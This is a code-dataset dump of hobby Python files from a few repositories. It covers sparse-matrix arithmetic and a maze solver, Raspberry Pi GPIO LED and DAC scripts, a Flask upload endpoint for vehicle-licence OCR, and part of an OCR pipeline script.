l=[]\r\n for i in range(self.rows()):\r\n s=[]\r\n for j in range(self.coloumns()):\r\n if self.list[i][j]!=0:\r\n #if it was 0 then no need to be written in the sparse form\r\n s.append((j,self.list[i][j]))\r\n l.append(s)\r\n return SparseMatrix(l,self.rows(),self.coloumns())\r\n \r\nclass SparseMatrix:\r\n def __init__(self,sparse_matrix,n_rows,n_cols):\r\n self.list=sparse_matrix\r\n self.row=n_rows\r\n self.col=n_cols\r\n def __str__(self):\r\n for i in range(self.row):\r\n #prev represents the index after which the last non-zero element ended\r\n prev=0\r\n for j in range(len(self.list[i])):\r\n (a,b)=self.list[i][j]\r\n for k in range(prev,a):\r\n print ('0 ',end='')\r\n print ('{} '.format(b),end='')\r\n prev=a+1\r\n for k in range(prev,self.col):\r\n print('0 ',end='')\r\n print('\\n')\r\n return '' \r\n\r\n def __add__(self,other):\r\n l=[[] for j in range(self.row)]\r\n for i in range(self.row):\r\n for j in range(self.col):\r\n #inp1 represents what value does self has at ith row and jth coloumn \r\n #inp2 represents what value does other has at ith row and jth coloumn\r\n inp1=0 \r\n inp2=0\r\n for k in range(len(self.list[i])):\r\n (a,b)=self.list[i][k]\r\n if j==a:\r\n #assert:self has non-zero value ith row jth column\r\n inp1=b\r\n break\r\n for k in range(len(other.list[i])):\r\n (a,b)=other.list[i][k]\r\n if j==a:\r\n #assert:other has non-zero value ith row jth column\r\n inp2=b\r\n break\r\n if inp1!=0:\r\n if inp2!=0:\r\n #assert: both of them are non-zero hence sum is appended\r\n l[i].append((j,inp1+inp2))\r\n else:\r\n #assert: only inp1 is non-zero hence appended\r\n l[i].append((j,inp1))\r\n else:\r\n if inp2!=0:\r\n #assert: only inp2 is non-zero hence appended\r\n l[i].append((j,inp2))\r\n #assert: if both inp1 and inp2 are 0 then no need to append \r\n return SparseMatrix(l,self.row,self.col)\r\n def __sub__(self,other):\r\n l=[[] for j in range(self.row)]\r\n for i in range(self.row):\r\n for j in range(self.col):\r\n #inp1 represents what value does self has at ith row and jth coloumn \r\n #inp2 represents what value does other has at ith row and jth coloumn\r\n inp1=0\r\n inp2=0\r\n for k in range(len(self.list[i])):\r\n (a,b)=self.list[i][k]\r\n if j==a:\r\n #assert:self has non-zero value ith row jth column\r\n inp1=b\r\n break\r\n for k in range(len(other.list[i])):\r\n (a,b)=other.list[i][k]\r\n if j==a:\r\n #assert:other has non-zero value ith row jth column\r\n inp2=b\r\n break\r\n if inp1!=0:\r\n if inp2!=0:\r\n #assert: both of them are non-zero hence difference is appended\r\n l[i].append((j,inp1-inp2))\r\n else:\r\n #assert: only inp1 is non-zero hence appended\r\n l[i].append((j,inp1))\r\n else:\r\n if inp2!=0:\r\n #assert: only inp2 is non-zero hence 0-inp2 appended\r\n l[i].append((j,-inp2))\r\n #assert: if both inp1 and inp2 are 0 then no need to append\r\n return SparseMatrix(l,self.row,self.col)\r\n def __mul__(self,other):\r\n a=self.row\r\n b=self.col\r\n assert other.row==b\r\n c=other.col\r\n X=[[] for i in range(a)]\r\n for i in range(a):\r\n for j in range(c):\r\n #iteration is performed for all ith rows and jth coloumns\r\n val=0 #this is the sum of products of elements in ith row and jth coloumn\r\n for k in range(b):\r\n #inp1 represents what value does self has at ith row and kth coloumn \r\n #inp2 represents what value does other has at kth row and jth coloumn\r\n inp1=0 \r\n inp2=0\r\n for x in range(len(self.list[i])):\r\n (p,q)=self.list[i][x]\r\n if k==p:\r\n #ith row and kth coloumn entry is non-negative\r\n inp1=q\r\n break\r\n for x in range(len(other.list[k])):\r\n (p,q)=other.list[k][x]\r\n if j==p:\r\n #kth row and jth coloumn entry is non-negative\r\n inp2=q\r\n break\r\n if inp1!=0:\r\n if inp2!=0:\r\n #assert: both of them are non-zero hence product is added to val\r\n val+=inp1*inp2 \r\n if val!=0:\r\n #if val was zero then there was no need to append\r\n X[i].append((j,val))\r\n return SparseMatrix(X,a,c)\r\n #nth_row function is only used in dense matrix conversion\r\n #nth_row gives the nth row with the zero elements (in dense form)\r\n def nth_row(self,n):\r\n #this gives the nth row of the matrix with zero elements also\r\n A=[0 for i in range(self.col)]\r\n for item in self.list[n]:\r\n (a,b)=item\r\n A[a]=b\r\n return A\r\n def toDense(self):\r\n D=[self.nth_row(j) for j in range(self.row)]\r\n return Matrix(D)\r\n\r\n\r\n#problem 3\r\n\r\n#move function appends the newposition to the list and marks previous position as 'X'(to avoid circular motion)\r\ndef move(arr,lis,di):\r\n (a,b)=lis[-1]\r\n if di==0: #right movement\r\n lis.append((a,b+1))\r\n arr[a][b]='X'\r\n if di==1: #down movement\r\n lis.append((a+1,b))\r\n arr[a][b]='X'\r\n if di==2: #left movement\r\n lis.append((a,b-1))\r\n arr[a][b]='X'\r\n if di==3: #up movement\r\n lis.append((a-1,b))\r\n arr[a][b]='X'\r\n\r\n#goodformat makes the list look good by replacing movements by 'U','D','R','L'\r\ndef goodFormat(s):\r\n for i in range(1,len(s)):\r\n #invariant: elements before index i-1 are converted to 'good' form\r\n (a,b)=s[i-1]\r\n (c,d)=s[i]\r\n if a==c:\r\n #assert: movement from a[i-1] to a[i] was either right or left\r\n if b==d+1:\r\n #assert: movement from a[i-1] to a[i] was left\r\n s[i-1]='L'\r\n else:\r\n #assert: movement from a[i-1] to a[i] was right\r\n s[i-1]='R'\r\n if a==c+1:\r\n #assert: movement from a[i-1] to a[i] was up\r\n s[i-1]='U'\r\n if a+1==c:\r\n #assert: movement from a[i-1] to a[i] was down\r\n s[i-1]='D'\r\n s.pop() # last element is poped since it is the location of 'E' and no further movements are to be made\r\n\r\ndef traverseMaze(file):\r\n #assert:maze is solvable\r\n with open(file) as f:\r\n temp=f.readlines() #temp is a temperorary list to store the strings\r\n f.close()\r\n l=[]\r\n for item in temp:\r\n a=item.split(' ')\r\n if a[-1]=='X\\n': #this condition is made since the the last element of each row has unwanted \\n (used for moving to next line) \r\n a[-1]='X'\r\n if a[-1]=='E\\n':\r\n a[-1]='E'\r\n if a[-1]=='S\\n':\r\n a[-1]='S'\r\n if a[-1]=='_\\n':\r\n a[-1]='_'\r\n l.append(a)\r\n # the list of lists l now contains the maze\r\n a=len(l[0])\r\n b=len(l)\r\n for i in range(b): # to find start and end position\r\n for j in range(a):\r\n if l[i][j]=='S':\r\n pos=(i,j) #this is staring position\r\n if l[i][j]=='E':\r\n lt=(i,j) #this is the end point\r\n s=[pos] #this is a list to store positions visited. last element is the current position\r\n arr=[[l[j][i] for i in range(a)] for j in range(b)] #duplicate maze\r\n (i,j)=pos\r\n while s[-1]!=lt:\r\n #invariant: all elements in list s do not represent position having 'E'\r\n if i>=1 and (arr[i-1][j]=='_' or arr[i-1][j]=='E'):\r\n move(arr,s,3)\r\n # moves up in the array\r\n i-=1\r\n continue\r\n if j>=1 and (arr[i][j-1]=='_' or arr[i][j-1]=='E'):\r\n move(arr,s,2)\r\n # moves left in the array\r\n j-=1\r\n continue\r\n if i<b-1 and (arr[i+1][j]=='_' or arr[i+1][j]=='E'):\r\n move(arr,s,1)\r\n # moves down in the array\r\n i+=1\r\n continue\r\n if j<a-1 and (arr[i][j+1]=='_' or arr[i][j+1]=='E'):\r\n move(arr,s,0)\r\n # moves right in the array\r\n j+=1\r\n continue\r\n #asssert: the current position has walls on all sides. Hence we must go back to previous position and choose some other path to go.\r\n (c,d)=s[-1]\r\n s.pop()\r\n arr[c][d]='X' #current position is marked as 'X' so to not repeat visits\r\n (i,j)=s[-1] #setting up i and j for next iteration of the loop\r\n #assert: the last element in s represents position with 'E'\r\n goodFormat(s)\r\n return s\r\n \r\n" } ]
4
Axalexan/raspberrypi
https://github.com/Axalexan/raspberrypi
b1af30b2ffd399766336bc1512ef759912e6fa89
14d95252a2e027e83e64ad434be0a4c5844b1b5d
753e99950dedacccc51ab3d47795a366ee277d9e
refs/heads/master
2023-04-03T08:12:35.396812
2021-04-12T15:31:37
2021-04-12T15:31:37
347,970,796
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.43784376978874207, "alphanum_fraction": 0.5104510188102722, "avg_line_length": 18.7391300201416, "blob_id": "ad1db6ad9182e0dbe0de7bbeb827308b54acce04", "content_id": "608e04d66fb0b57fb920c819ee82e966982a910b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 909, "license_type": "no_license", "max_line_length": 53, "num_lines": 46, "path": "/12_04_sc1.py", "repo_name": "Axalexan/raspberrypi", "src_encoding": "UTF-8", "text": "import RPi.GPIO as GPIO\nimport time\nchan_list = [26, 19, 13, 6, 5, 11, 9, 10, 17]\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(chan_list, GPIO.OUT)\n\n\nnumbers={7:26, 6:19, 5:13, 4:6, 3:5, 2:11, 1:9, 0:10}\n\nGPIO.output(17, 1)\n\n\ndef decToBinList(decNumber):\n s = []\n while decNumber > 0:\n s.append(decNumber % 2)\n decNumber //= 2\n while len(s) < 8:\n s.append(0)\n a = []\n for i in range(len(s) - 1, -1, -1):\n a.append(s[i])\n return s\n\ndef num2dec(value):\n k = decToBinList(value)\n for i in range(8):\n if k[i] == 1:\n GPIO.output(numbers[i],1)\n\n\n\ntry:\n while True:\n\n print('Enter value (-1 to exit)')\n i = int(input())\n if i == -1:\n break\n print(i ,' = ', round(3.3*(i/255),2) ,'V')\n GPIO.output(chan_list,0)\n GPIO.output(17,1)\n num2dec(i)\n time.sleep(0.1)\nfinally:\n GPIO.cleanup()\n\n" }, { "alpha_fraction": 0.44948065280914307, "alphanum_fraction": 0.5108593106269836, "avg_line_length": 19.326923370361328, "blob_id": "9b6ead46a8369804eccba1061be7be88cc626731", "content_id": "4fb0bacd65369acdb46b57da35ad3d6628bf78d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1081, "license_type": "no_license", "max_line_length": 53, "num_lines": 52, "path": "/kek.py", "repo_name": "Axalexan/raspberrypi", "src_encoding": "UTF-8", "text": "import RPi.GPIO as GPIO\nimport time\nchan_list = [26, 19, 13, 6, 5, 11, 9, 10]\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(chan_list, GPIO.OUT)\n\n\nnumbers={7:26, 6:19, 5:13, 4:6, 3:5, 2:11, 1:9, 0:10}\n\n\ndef decToBinList(decNumber):\n s = []\n while decNumber > 0:\n s.append(decNumber % 2)\n decNumber //= 2\n while len(s) < 8:\n s.append(0)\n a = []\n for i in range(len(s) - 1, -1, -1):\n a.append(s[i])\n return s\n\ndef num2dec(value):\n k = decToBinList(value)\n for i in range(8):\n if k[i] == 1:\n GPIO.output(numbers[i],1)\n\nprint('Введите число повторений')\n\n\ntry:\n def scr(t):\n for i in range(t):\n for j in range(256):\n GPIO.output(chan_list,0)\n num2dec(j)\n time.sleep(0.01)\n for k in range(255,-1,-1):\n GPIO.output(chan_list,0)\n num2dec(k)\n time.sleep(0.01)\n t = int(input())\n scr(t)\nexcept Exception:\n print('Error')\n\nfinally:\n GPIO.output(chan_list,0)\n\n\nGPIO.cleanup()\n\n\n" }, { "alpha_fraction": 0.4285714328289032, "alphanum_fraction": 0.5088702440261841, "avg_line_length": 20.87755012512207, "blob_id": "e4905df2ab6e172aab40b5f0e271534bdb68ad58", "content_id": "3c28098af0efb3e4de7cb1ec9db83495f8e9f1c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1071, "license_type": "no_license", "max_line_length": 87, "num_lines": 49, "path": "/12_04_sc2.py", "repo_name": "Axalexan/raspberrypi", "src_encoding": "UTF-8", "text": "import RPi.GPIO as GPIO\nimport time\nchan_list = [26, 19, 13, 6, 5, 11, 9, 10, 17]\nchan_list1 = [26, 19, 13, 6, 5, 11, 9, 10]\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(chan_list, GPIO.OUT)\nGPIO.setup(4, GPIO.IN)\n\n\nnumbers={7:26, 6:19, 5:13, 4:6, 3:5, 2:11, 1:9, 0:10}\n\nGPIO.output(17, 1)\n\n\ndef decToBinList(decNumber):\n s = []\n while decNumber > 0:\n s.append(decNumber % 2)\n decNumber //= 2\n while len(s) < 8:\n s.append(0)\n a = []\n for i in range(len(s) - 1, -1, -1):\n a.append(s[i])\n return s\n\ndef num2dec(value):\n k = decToBinList(value)\n for i in range(8):\n if k[i] == 1:\n GPIO.output(numbers[i],1)\n else:\n GPIO.output(numbers[i],0)\n\ntry:\n GPIO.setwarnings(False)\n k=-1\n while True:\n #if GPIO.input(4)==0:\n for i in range(256):\n num2dec(i)\n time.sleep(0.001)\n if GPIO.input(4) == 0:\n print('Digital value ',i, ', Analog value:', round(3.3*(i/255),1), 'V')\n break\n \n\nfinally:\n GPIO.cleanup()" }, { "alpha_fraction": 0.4935622215270996, "alphanum_fraction": 0.6523604989051819, "avg_line_length": 20.272727966308594, "blob_id": "b7fc5b338994178874883c32e553c0ad896d20bb", "content_id": "300cbe1fa346126637716af8cdd40e26a95729c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 233, "license_type": "no_license", "max_line_length": 53, "num_lines": 11, "path": "/2script.py", "repo_name": "Axalexan/raspberrypi", "src_encoding": "UTF-8", "text": "import RPi.GPIO as GPIO\nimport time\nchan_list = [26, 19, 13, 6, 5, 11, 9, 10, 17]\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(chan_list, GPIO.OUT)\n\n\nnumbers={7:26, 6:19, 5:13, 4:6, 3:5, 2:11, 1:9, 0:10}\nGPIO.output(chan_list,0)\n\nGPIO.cleanup()" }, { "alpha_fraction": 0.5523648858070374, "alphanum_fraction": 0.5906531810760498, "avg_line_length": 19.390804290771484, "blob_id": "6855e11bb4be95fa56c05886627b8c9746994591", "content_id": "609e9341d7974d4598e1182829c88f43e731db7e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1776, "license_type": "no_license", "max_line_length": 54, "num_lines": 87, "path": "/TEST.py", "repo_name": "Axalexan/raspberrypi", "src_encoding": "UTF-8", "text": "import RPi.GPIO as GPIO\nGPIO.cleanup()\nimport time\nchan_list = [21, 20, 16, 12, 7, 8, 25, 24]\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(chan_list, GPIO.OUT)\n\n\nnumbers={7:21, 6:20, 5:16, 4:12, 3:7, 2:8, 1:25, 0:24}\n\n\ndef lightup(ledNumber, period):\n GPIO.output(numbers[ledNumber],1)\n time.sleep(period)\n GPIO.output(numbers[ledNumber],0)\n\n\ndef lightdown(ledNumber, period):\n GPIO.output(numbers[ledNumber],0)\n time.sleep(period)\n GPIO.output(numbers[ledNumber],1)\n\n\ndef blink(ledNumber, blinkCount, BlinkPeriod):\n for i in range(0,blinkCount):\n lightup(ledNumber, BlinkPeriod)\n lightdown(ledNumber, BlinkPeriod)\n\n\ndef runningLight(count, period):\n for i in range(count):\n for j in range(8):\n lightup(j, period)\n\n\ndef runningDark(count, period):\n GPIO.output(chan_list,1)\n for i in range(count):\n for j in range(8):\n lightdown(j, period)\n else:\n GPIO.output(chan_list,0)\n\n\ndef decToBinList(decNumber):\n s = []\n while decNumber > 0:\n s.append(decNumber % 2)\n decNumber //= 2\n while len(s) < 8:\n s.append(0)\n a = []\n for i in range(len(s) - 1, -1, -1):\n a.append(s[i])\n return s\n\n\ndef lightNumber(number):\n s = decToBinList(number)\n for i in range(7,-1,-1):\n GPIO.output(numbers[i],s[i])\n else:\n time.sleep(1)\n\n\ndef light2(s):\n for i in range(7,-1,-1):\n GPIO.output(numbers[i],s[i]) \n\n\ndef runningPattern(pattern , direction):\n s = decToBinList(pattern)\n p = pattern\n while True:\n pattern = p\n for i in range(8):\n time.sleep(0.5)\n GPIO.output(chan_list,0)\n lightNumber(pattern)\n pattern = pattern << 1\n \n\n\nrunningPattern(2, 1)\n\n\nGPIO.cleanup()\n\n\n" } ]
5
raduleo19/Machine-Learning
https://github.com/raduleo19/Machine-Learning
72d00237315a520ef86ae1d4aae9fdc532010afb
96477f4f11aafef218fdd6bea9e5741ce065d4ad
d8cca8a06772170f9f21ec35249a6a18bd781d32
refs/heads/master
2022-04-22T16:48:25.793302
2020-04-22T00:03:37
2020-04-22T00:03:37
248,806,840
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6165870428085327, "alphanum_fraction": 0.6426400542259216, "avg_line_length": 27.33757972717285, "blob_id": "be537307ea37c424e62d5a4431fb94826e686183", "content_id": "63141a8b09258632be7daa5194bbe3dd8b0dbec6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4606, "license_type": "no_license", "max_line_length": 83, "num_lines": 157, "path": "/Organ Segmentation/organ_segmentation.py", "repo_name": "raduleo19/Machine-Learning", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport cv2\r\nimport sys\r\nimport imutils\r\nimport skimage.segmentation as seg\r\nfrom sklearn.preprocessing import minmax_scale\r\nfrom skimage import io, img_as_float32, img_as_float, img_as_ubyte\r\nfrom skimage.color import label2rgb\r\nfrom skimage.restoration import denoise_nl_means, estimate_sigma\r\nfrom skimage.filters import gaussian\r\nfrom collections import Counter\r\n\r\ndef get_first_unvisited(matrix, visited, color):\r\n rows = matrix.shape[0]\r\n cols = matrix.shape[1]\r\n\r\n for i in range(rows):\r\n for j in range(cols):\r\n if (matrix[i][j] == color) and (visited[i][j] == 0):\r\n return i, j\r\n\r\n return -1, -1\r\n\r\n# Read image and reference\r\noriginal_image = np.loadtxt(sys.argv[1])\r\nmask = np.loadtxt(sys.argv[2])\r\n\r\n# Scale\r\ncenter = (original_image.min() + original_image.max()) / 2\r\noriginal_image -= center\r\noriginal_image /= abs(original_image.min())\r\noriginal_image = img_as_ubyte(original_image)\r\n\r\nplt.subplot(2, 4, 1)\r\nplt.title(\"Before Preprocesing\")\r\nplt.imshow(original_image, cmap=\"gray\")\r\n\r\n# Preprocessing\r\n\r\n# Enhance image\r\nenhanced_image = cv2.equalizeHist(original_image)\r\n\r\n# Smooth image\r\nsmoothed_image = cv2.medianBlur(enhanced_image, 3)\r\n\r\n# Denoise\r\ndenoised_image = cv2.fastNlMeansDenoising(\r\n src=smoothed_image, dst=None, h=17, templateWindowSize=14, searchWindowSize=25)\r\n\r\n# Show after preprocessing\r\nplt.subplot(2, 4, 2)\r\nplt.title(\"After Preprocesing\")\r\nplt.imshow(denoised_image, cmap=\"gray\")\r\n\r\n# Segment by Color With K-Means\r\nvectorized_image = denoised_image.reshape((-1, 1))\r\nvectorized_image = img_as_float32(vectorized_image)\r\n\r\nK = 10\r\nsegmentation_found = 0\r\n\r\nwhile segmentation_found != 1:\r\n criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)\r\n ret, label, center = cv2.kmeans(\r\n vectorized_image, K, None, criteria, 70, cv2.KMEANS_PP_CENTERS)\r\n\r\n center = img_as_ubyte(center)\r\n res = center[label.flatten()]\r\n segmented_image = res.reshape((denoised_image.shape))\r\n segmented_image = img_as_ubyte(segmented_image)\r\n\r\n # Extract our segment\r\n intersection = cv2.bitwise_or(\r\n segmented_image, segmented_image, mask=img_as_ubyte(mask))\r\n plt.subplot(2, 4, 6)\r\n plt.title(\"Intersection\")\r\n plt.imshow(intersection)\r\n\r\n # Extract our dominant color\r\n non_black_pixels = np.array(intersection).flat\r\n non_black_pixels = non_black_pixels[non_black_pixels != 0]\r\n bincount = np.bincount(non_black_pixels)\r\n dominant_color = bincount.argmax()\r\n total_pixels = np.sum(mask[mask > 0])\r\n print(dominant_color)\r\n print(total_pixels)\r\n\r\n # Extract the organ\r\n body_part = np.zeros((segmented_image.shape), np.uint8)\r\n start_x, start_y = get_first_unvisited(\r\n intersection, body_part, dominant_color)\r\n print(start_x, start_y)\r\n\r\n selected_pixels = 0\r\n stack = []\r\n stack.append((start_x, start_y))\r\n while stack:\r\n x, y = stack.pop()\r\n if segmented_image[x][y] == dominant_color:\r\n if body_part[x, y] == 0:\r\n selected_pixels += 1\r\n body_part[x, y] = 255\r\n if x > 0:\r\n stack.append((x - 1, y))\r\n if x < 511:\r\n stack.append((x + 1, y))\r\n if y > 0:\r\n stack.append((x, y - 1))\r\n if y < 511:\r\n stack.append((x, y + 1))\r\n\r\n if selected_pixels * 100 > 56 * total_pixels:\r\n segmentation_found = 1\r\n K -= 1\r\n\r\nplt.subplot(2, 4, 3)\r\nplt.title(\"K-Means Color Segmentation - RGB View\")\r\nplt.imshow(label2rgb(segmented_image))\r\n\r\nplt.subplot(2, 4, 4)\r\nplt.title(\"K-Means Color Segmentation - Grayscale View\")\r\nplt.imshow(segmented_image)\r\n\r\nplt.subplot(2, 4, 5)\r\nplt.title(\"Mask\")\r\nplt.imshow(mask)\r\n\r\nplt.subplot(2, 4, 7)\r\nplt.title(\"Result\")\r\nplt.imshow(body_part, cmap=\"gray\")\r\n\r\n# Postprocessing\r\n\r\n# Enhance image\r\nenhanced_image = cv2.equalizeHist(body_part)\r\n\r\n# Smooth image\r\nsmoothed_image = cv2.GaussianBlur(enhanced_image, (5, 5), 2)\r\n\r\n# Denoise\r\ndenoised_image = cv2.fastNlMeansDenoising(\r\n src=smoothed_image, dst=None, h=10, templateWindowSize=9, searchWindowSize=23)\r\n\r\n# Dilated\r\ndilated_image = cv2.dilate(denoised_image, (3, 3),iterations = 5)\r\n\r\n# Threshold Filter\r\nthresh_image = cv2.threshold(dilated_image, 180, 255, cv2.THRESH_BINARY)[1]\r\nthresh_image[thresh_image > 0] = 1\r\nnp.savetxt(\"optim.out\", thresh_image)\r\n\r\nplt.subplot(2, 4, 8)\r\nplt.title(\"After Postprocessing - FINAL\")\r\nplt.imshow(img_as_ubyte(thresh_image))\r\n\r\nplt.show()\r\n" }, { "alpha_fraction": 0.824999988079071, "alphanum_fraction": 0.824999988079071, "avg_line_length": 12.333333015441895, "blob_id": "afda24323cbe1f64114dc67abe2153eb4d124d28", "content_id": "ccd1bbc5cedb57b10da22c8cdd8a1f0b1c3eaf51", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 40, "license_type": "no_license", "max_line_length": 19, "num_lines": 3, "path": "/README.md", "repo_name": "raduleo19/Machine-Learning", "src_encoding": "UTF-8", "text": "# Machine-Learning\n\nVarious experiments\n" } ]
2
bboalimoe/D_Server
https://github.com/bboalimoe/D_Server
10ea044acef478496f5ebc13634b33c8e36124d7
2c83021fad11e72c1fa526bddafada59281d398d
d626b006124e443acd22b0e35f7203442ca9cc67
refs/heads/master
2021-01-23T05:57:00.999662
2017-06-12T09:03:57
2017-06-12T09:03:57
93,005,743
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5564085245132446, "alphanum_fraction": 0.5851134657859802, "avg_line_length": 30.87234115600586, "blob_id": "537dcd498fe260706d1baf192d82a838172f7cc0", "content_id": "ec053330c2b098ce2dbb6e10a3ab2ff1f9d3e88a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2996, "license_type": "permissive", "max_line_length": 129, "num_lines": 94, "path": "/server.py", "repo_name": "bboalimoe/D_Server", "src_encoding": "UTF-8", "text": "__author__ = 'zhanghengyang'\nfrom flask import Flask\nimport os\nimport json\nfrom flask import request\nimport uuid\nimport numpy as np\nimport cv2\nimport json\nimport _process_image as pi\n#from _process_image import CRect, Cvec4i\nimport time\nimport random\nimport string\n#from preprocessing import proc\nfrom licenseRec import process\n\n\ndef proc(res):\n \n return res\n\ndef fname():\n\n return str(int(time.time())) + '_' + ''.join(random.choice(string.uppercase+string.digits) for _ in range(20))\n\n\napp = Flask(__name__)\n\npath = '/home/advanpro/photos'\ntemp_path = '/home/ubuntu/ocr/VLRecognitionSuiteServerSO/Debug/temp.jpg'\n\[email protected]('/upload', methods=['POST'])\ndef upload():\n if request.method == 'GET':\n return \"no GET method supported\"\n\n if request.method == 'POST':\n file = request.files['filename']\n _headers = request.headers\n print _headers\n print type(_headers)\n if type(_headers) != 'NoneType':\n ClicenseRect = json.loads( _headers.get('ClicenseRect', \"[0,0,0,0]\"))\n CstampRect = json.loads(_headers.get('CstampRect', \"[0,0,0,0]\"))\n CenginLine = json.loads(_headers.get('CenginLine', \"[0,0,0,0]\"))\n CvinLine = json.loads(_headers.get('CvinLine', \"[0,0,0,0]\"))\n r1 = (ClicenseRect[0], ClicenseRect[1], ClicenseRect[2], ClicenseRect[3])\n r2 = (CstampRect[0], CstampRect[1], CstampRect[2], CstampRect[3])\n v1 = (CenginLine[0], CenginLine[1], CenginLine[2], CenginLine[3] )\n v2 = (CvinLine[0], CvinLine[1], CvinLine[2], CvinLine[3])\n #print type(file)\n #data = request.data\n #rstream = file.stream.read()\n #barray = np.asarray(bytearray(rstream))\n #img = cv2.imdecode(barray,1)\n #print \"file info\",file\n f_name = path + fname()\n file.save(f_name)\n# print \"f_name\", f_name\n# print r1\n# \tprint r2\n#\tprint v1\n#\tprint v2\n#\tf_name2 = path + \"btest.jpg\"\n# res2 = pi.process_image(f_name2, r1, r2, v1, v2) \n#\tprint json.dumps(res2)\n #res = pi.process_image(f_name, r1, r2, v1, v2)\n\n #img_path = \"/home/advanpro/OCR-CORE/raw_image/license-train/test_new.jpg\"\n status, info = process(img_path)\n print type(info), info\n for (k,v) in info.items():\n print(k+':'+v.encode('utf-8'))\n\n # if res['flag'] != 6 and res['flag'] != 5:\n # if os.path.exists(f_name):\n # os.remove(f_name)\n # else:\n # print 'no such file:%s' % f_name\n # file.flush()\n print \"=========start=======\"\n print \"=========end=========\"\n #res = proc()\n return json.dumps(info).encode('utf8')\n\n\nif __name__ == \"__main__\":\n print \"start server!!!\"\n# zeros = (0, 0, 0, 0)\n# pi.process_image(\"~/ocr/VLRecognitionSuiteServerSO/Debug/photos/1483845738_ZGBINXQ9DXLLJZOS6LYV\",zeros, zeros, zeros, zeros)\n app.debug = True\n app.run(host=\"0.0.0.0\",port=8080)\n print \"stop server!!!\"\n" }, { "alpha_fraction": 0.4910583794116974, "alphanum_fraction": 0.5257299542427063, "avg_line_length": 43.17741775512695, "blob_id": "ae90826ed73adf1b3d7157ad54631d78123ac40b", "content_id": "a6d91dce55231fc55e9e1f9b089defd77cc46cfa", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10990, "license_type": "permissive", "max_line_length": 101, "num_lines": 248, "path": "/licenseRect.py", "repo_name": "bboalimoe/D_Server", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n#coding:utf-8\n\nimport numpy as np\nimport os\nimport cv2\nimport sys\nimport shutil\nimport codecs\n\nimport configPath\nfrom args import args\n\nfrom other import draw_boxes\nfrom text_dtc.textDetectionCTPN import textDetection\nfrom char_seg.CharSegmentation import CharSegmentation\nfrom char_reg.TextRecognition import TextRecognition\nfrom char_reg.BuildDictionary import buildDictionary\nfrom text_item.arrangeItems import arrangeItems\n#\n# textline detector\ntext_detector = textDetection(configPath.ROOT_PATH, args.gpu_cpu, args.gpu_no, \\\n args.license_size[0], args.license_size[1])\n# character segmentor\nseg_model = configPath.ROOT_PATH + args.model_set_dir + args.char_seg_model\nchar_segmentor = CharSegmentation(args.textline_height, args.textline_width,\\\n seg_model, args.gpu_cpu, args.gpu_no)\n# text recognizer\ntext_recognizer = TextRecognition(configPath.ROOT_PATH, args)\n# dic\nchn_file_path = configPath.ROOT_PATH + args.model_set_dir + args.char_chn_code\neng_file_path = configPath.ROOT_PATH + args.model_set_dir + args.char_eng_code\nchar2code, code2char = buildDictionary(chn_file_path, eng_file_path)\n# aggrange items\nitemizer = arrangeItems(args, configPath)\n# debug flag\ndebug = True\n# parameters\ntextline_std_height = 65\ntextline_extend = 20\n\"\"\"\nimage: image path, absolute path\nrect: license position (x0,y0, x1,y1)\nstatus: license version\n\"\"\"\ndef process(image=None, rect=None, status=None):\n # initialize\n ret_status = {'0':1.0,\\\n '1':0.0,'2':0.0,'3':0.0,'4':0.0,'5':0.0,\\\n '6':0.0,'7':1.0,'8':0.0,'9':0.0,'10':0.0,'11':0.0,\\\n '12':0.0,'13':0.0}\n ret_info = {'0':'中华人民共和国机动车行驶证'.decode('utf-8'),\\\n '1':'','2':'','3':'','4':'','5':'',\\\n '6':'','7':'印章'.decode('utf-8'),'8':'','9':'','10':'','11':''}\n # process\n if os.path.isfile(image):\n image_name = os.path.basename(image)\n # read image\n img = cv2.imread(image)\n if img is None:\n print('Image doese not exist!')\n ret_status['12'] = 0\n return ret_status, ret_info\n if rect is None:\n license = img\n else:\n license = img[int(rect[1]):int(rect[3]),int(rect[0]):int(rect[2])]\n # detect textline\n textlines, truelines, license = text_detector.detecText(license)\n if textlines is None or textlines.shape[0] == 0:\n print('Textline does not exist!')\n ret_status['12'] = 1\n return ret_status, ret_info\n if debug:\n im_with_text_lines = draw_boxes(license, textlines, is_display=False, \\\n caption='textline', wait=True)\n cv2.imwrite('./debug/license_detect/'+ image_name, im_with_text_lines)\n # tilt correct and textline crop, and resize\n textline_imges, textline_poses = [], []\n for i in xrange(textlines.shape[0]):\n textline_name = image_name[0:image_name.find('.')] + '_' + str(i) + '.png'\n textline = textlines[i,:]\n trueline = truelines[i,:]\n pts1 = np.float32([[trueline[0],trueline[1]],[trueline[3],trueline[4]],\\\n [trueline[0],trueline[2]],[trueline[3],trueline[5]]])\n pts2 = np.float32([[textline[0],textline[1]],[textline[2],textline[1]],\\\n [textline[0],textline[3]],[textline[2],textline[3]]])\n M = cv2.getPerspectiveTransform(pts1,pts2)\n dst = cv2.warpPerspective(license, M, (license.shape[1],license.shape[0]))\n textline[0] = max(0, textline[0]-textline_extend)\n textline[2] = min(textline[2]+textline_extend,license.shape[1])\n textline_img = dst[int(textline[1]):int(textline[3]),int(textline[0]):int(textline[2]),:]\n scale = 